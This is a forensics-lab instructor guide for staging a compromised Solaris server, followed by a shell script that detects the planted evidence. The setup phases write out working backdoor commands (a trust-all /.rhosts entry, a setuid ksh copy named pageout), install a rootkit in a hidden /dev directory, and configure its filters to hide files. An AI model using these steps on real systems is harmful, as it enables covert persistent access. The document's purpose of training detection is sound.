# Instructor Guide for Setting up a Compromised Server: Module 7 LAB

## Purpose

To teach students how to detect and evaluate a compromised server. This lab is the culmination of the first 6 chapters of SC300 Rev D.

## Importance

This lab provides practical experience based on real-world case studies of compromised servers.

## Requirements

- Students will work in teams of 2-4 per compromised workstation.
- Choose a workstation that is not being used by a student (if available).
- Students will have one hour to answer as many questions as they can.

## Questions

- When did the compromise take place, and what evidence do you have to support it?
- From what host did the attacker log in, and what evidence do you have to support it?
- Which user compromised the server, and what evidence do you have to support it?
- Did the user put any back doors on the server? If so:
  - What are their names?
  - Where were they installed?
  - What do they do?
- Was a root kit installed on the server? If so:
  - What files were replaced?
  - Where was the root kit downloaded to?

## Setup Instructions

### Phase I - Setting up backdoors

1) Log in remotely to the compromised server as user "bob".

2) Make 3 invalid su attempts to root and then succeed on the 4th attempt. This will leave clues in /var/adm/messages and sulog.

3) Set up the following backdoors:

```
# sh
# echo "+" > /.rhosts
# cp /bin/ksh /bin/pageout
# chmod 6555 /bin/pageout
```

### Phase II - Obtaining and installing the root kit

4) Use ftp to copy the root kit from the classroom server.

```
# mkdir /dev/"..."
# cd /dev/"..."
# ftp server
Connected to simms.
220 simms FTP server (SunOS 5.8) ready.
Name (simms:root):
331 Password required for root.
Password:
230 User root logged in.
ftp> cd /usr/local/pkg
250 CWD command successful.
ftp> bin
200 Type set to I.
ftp> hash
Hash mark printing on (8192 bytes/hash mark).
ftp> mget sun2*
mget sun2.rootkit.tar? y
200 PORT command successful.
150 Binary data connection for sun2.rootkit.tar (10.10.1.10,32816) (1740800 bytes).
###############################################################################
226 Binary Transfer complete.
local: sun2.rootkit.tar remote: sun2.rootkit.tar
1740800 bytes received in 0.24 seconds (7001.71 Kbytes/s)
ftp> bye
```

5) Uncompress, unpack and install the root kit.

```
# gunzip sun2.rootkit.tar.gz
# tar xvf sun2.rootkit.tar
x sun2.rootkit, 0 bytes, 0 tape blocks
x sun2.rootkit/me, 859600 bytes, 1679 tape blocks
x sun2.rootkit/ls, 41708 bytes, 82 tape blocks
x sun2.rootkit/netstat, 6784 bytes, 14 tape blocks
x sun2.rootkit/tcpd, 19248 bytes, 38 tape blocks
x sun2.rootkit/setup.sh, 1962 bytes, 4 tape blocks
<>
# cd sun2.rootkit
# ./setup.sh
hax0r w1th gforce
Ok This thing is complete :-)
cp: cannot access l0gin
cp: cannot create /usr/local/bin/find: No such file or directory
mv: cannot access /etc/.ts
mv: cannot access /etc/.tp
- WTMP:
<>
```

### Phase III - Configuring the root kit

6) Edit the root kit filter files to hide /.rhosts and /bin/pageout.

```
# vi /var/spool/.recent/.files
<>
bot
...
pageout
.rhosts
/bin/pageout
/.rhosts
```

```
# vi /var/spool/.recent/.find_filter
<>|grep -v '/usr/man/man1/.. '|grep -v '.rhosts'|grep -v 'pageout'
```

7) Make sure the new ls and find trojans hide the .rhosts and /bin/pageout files.

```
# ls -la /.rhosts
# ls -l /bin/pageout
```

8) Log out as root and then as bob.

```
# exit
$ exit
Connection closed.
```

### Phase IV - Creating decoys

9) Log in as both users bob and alice to create some activity.

10) Have alice execute the pageout SUID shell.

```
$ pageout
#
```

11) The compromised server is now set up. The students will be responsible for answering the questions listed above.
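The following checker is an added example and is not part of the SC300 lab guide or the root kit. It looks for the evidence the students are expected to find: a trust-all `/.rhosts`, a setuid copy of a shell under `/bin`, a hidden dot-named directory under `/dev`, the root kit's filter files, and a run of failed `su` attempts to root followed by a success in `sulog`. It takes a root prefix so it can be run against a mounted image or the constructed sample tree built by `build_sample_tree`; the `sulog` line format it parses (`SU MM/DD HH:MM +|- tty from-to`), the 3-failure threshold, the list of shell names and all sample values are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the lab guide: report the artifacts that the
# setup phases leave behind, given a root prefix (a mounted image or the
# constructed tree from build_sample_tree). Assumes Solaris-style sulog
# lines: "SU MM/DD HH:MM <+|-> tty from-to".

check_compromise() {
    r="${1:-}"

    # Backdoor 1: a "+" line in /.rhosts trusts every remote host for r-commands.
    if [ -f "$r/.rhosts" ] && grep -qx '+' "$r/.rhosts"; then
        echo "FINDING: /.rhosts contains '+' (trusts every remote host)"
    fi

    # Backdoor 2: a setuid file under /bin that is byte-identical to a shell.
    if [ -d "$r/bin" ]; then
        for f in $(find "$r/bin" -type f -perm -4000 2>/dev/null); do
            for shell in "$r/bin/sh" "$r/bin/ksh" "$r/bin/csh" "$r/bin/bash"; do
                [ -f "$shell" ] || continue
                if [ "$f" != "$shell" ] && cmp -s "$f" "$shell"; then
                    echo "FINDING: setuid file ${f#"$r"} is a copy of ${shell#"$r"} (setuid shell backdoor)"
                    break
                fi
            done
        done
    fi

    # Root kit staging: any dot-named directory (such as "...") under /dev.
    if [ -d "$r/dev" ]; then
        for d in $(find "$r/dev" -type d -name '.*' 2>/dev/null); do
            echo "FINDING: hidden directory ${d#"$r"} under /dev"
        done
    fi

    # Root kit configuration: the filter files the trojaned ls and find read.
    for cfg in /var/spool/.recent/.files /var/spool/.recent/.find_filter; do
        if [ -f "$r$cfg" ]; then
            echo "FINDING: root kit filter file $cfg present"
        fi
    done

    # Timeline: three or more failed su attempts to a target, then a success.
    if [ -f "$r/var/adm/sulog" ]; then
        awk '$1 == "SU" && $4 == "-" { fail[$6]++; if (!($6 in first)) first[$6] = $2 " " $3 }
             $1 == "SU" && $4 == "+" {
                 if (fail[$6] >= 3)
                     printf "FINDING: %s succeeded at %s %s after %d failures (first at %s)\n",
                            $6, $2, $3, fail[$6], first[$6]
                 fail[$6] = 0; delete first[$6]
             }' "$r/var/adm/sulog"
    fi
    return 0
}

# Builds a throwaway tree mirroring the lab's artifacts so the checker can be
# exercised without touching a real host. Every value here is constructed.
build_sample_tree() {
    r="$1"
    mkdir -p "$r/bin" "$r/dev/..." "$r/var/adm" "$r/var/spool/.recent"
    printf '#!/bin/sh\necho stand-in for ksh\n' > "$r/bin/ksh"
    chmod 755 "$r/bin/ksh"
    cp "$r/bin/ksh" "$r/bin/pageout"      # mirrors "cp /bin/ksh /bin/pageout"
    chmod 6555 "$r/bin/pageout"           # setuid+setgid, as in Phase I
    echo '+' > "$r/.rhosts"
    printf 'pageout\n.rhosts\n' > "$r/var/spool/.recent/.files"
    printf "grep -v '.rhosts'|grep -v 'pageout'\n" > "$r/var/spool/.recent/.find_filter"
    cat > "$r/var/adm/sulog" <<'EOF'
SU 03/12 14:01 - pts/2 bob-root
SU 03/12 14:01 - pts/2 bob-root
SU 03/12 14:02 - pts/2 bob-root
SU 03/12 14:02 + pts/2 bob-root
SU 03/12 15:30 + console root-root
EOF
}

# Demonstration against the constructed tree (prints six FINDING lines).
demo=$(mktemp -d)
build_sample_tree "$demo"
check_compromise "$demo"
rm -rf "$demo"
```

On a real lab box the trojaned `ls` and `find` would hide `/.rhosts` and `/bin/pageout` from students who run them in place, which is why the checker is written to run against a prefix: point it at a copy of the disk mounted read-only, or at a tree produced with known-good binaries from installation media, and the filter files under `/var/spool/.recent` cannot interfere.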